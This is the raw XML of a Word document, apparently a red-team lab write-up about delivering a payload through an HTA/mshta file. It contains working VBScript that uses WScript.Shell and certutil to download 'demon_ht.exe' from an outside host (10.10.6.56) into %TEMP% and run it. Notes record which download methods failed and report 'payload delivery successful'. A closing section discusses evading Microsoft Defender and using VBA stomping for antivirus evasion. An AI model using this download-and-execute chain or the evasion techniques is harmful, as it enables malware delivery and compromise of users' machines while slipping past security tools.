    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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HTML</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meta</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i/>
          <w:iCs/>
          <w:color w:val="FEDE5D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>http-equiv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="B6B1B1"/>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"Content-Type"</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i/>
          <w:iCs/>
          <w:color w:val="FEDE5D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="B6B1B1"/>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"text/html; charset=utf-8"</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HEAD</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script</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i/>
          <w:iCs/>
          <w:color w:val="FEDE5D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="B6B1B1"/>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"VBScript"</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E4450"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Window</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ReSizeTo</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2EE2FA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0</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2EE2FA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0</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E4450"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Window</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moveTo</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FEDE5D"/>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2000</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FEDE5D"/>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2000</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E4450"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Set</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FF7EDB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>objShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="36F9F6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>CreateObject</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"Wscript.Shell"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w: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7EDB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>objShell</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Run</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FF8B39"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"certutil.exe -urlcache -split -f http://10.10.6.56:8000/demon_ht.exe %TEMP%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="36F9F6"/>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demon_ht.exe &amp; %TEMP%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="36F9F6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF8B39"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>demon_ht.exe"</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7EDB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>objShell</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2EE2FA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF8B39"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"calc.exe"</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7EDB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="36F9F6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>close</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script</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body</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FFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>demo</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body</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HEAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="36F9F6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&gt;</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36F9F6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="72F1B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="36F9F6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&gt;</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Objshell.run command is important here multiple mechanisms to download and execute were tried and it was found that for compatibility with mshta :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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FFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>1. certutil doesnt work</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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>2. Curl doesnt work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="262335"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="BBBBBB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>3. powershell has  gives a vba error</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Thr vba error given by powershell:</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1481455"/>
            <wp:effectExtent l="0" t="0" r="10160" b="4445"/>
            <wp:docPr id="1" name="Picture 1" descr="error_in_mshta_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ror_in_mshta_powershell"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266690" cy="1481455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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however using certutil and using cmd.exe in a vbscript it was possible to get this payload delivery mechanism working.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="262335"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="BBBBBB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF7EDB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>objShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="2EE2FA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF8B39"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"cmd.exe /c certutil.exe -urlcache -split -f http://10.10.6.56:8001/demon_ht.exe %TEMP%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="36F9F6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF8B39"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>demon_ht.exe &amp; %TEMP%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="36F9F6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF8B39"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>demon_ht.exe"</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1481455"/>
            <wp:effectExtent l="0" t="0" r="10160" b="4445"/>
            <wp:docPr id="3" name="Picture 3" descr="after_enable_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fter_enable_editing"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266690" cy="1481455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload delivery successful.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>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bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Future scope:</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Though the delivery mechanism works but till mshta command if the payload is evaded it is not caught by defender, however the doc itself gets caught in the latest defender version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1481455"/>
            <wp:effectExtent l="0" t="0" r="1016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6690" cy="1481455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using vba scripts for payload execution and vba stomping may  be pursued for better antivirus evasion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Aria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ymbol">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73807"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CCB73807"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="F67F6B04"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F67F6B04"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="F7FA3281"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F7FA3281"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="FAFE5B53"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FAFE5B53"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="FAFE85C7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FAFE85C7"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="FFDE5C6F"/>
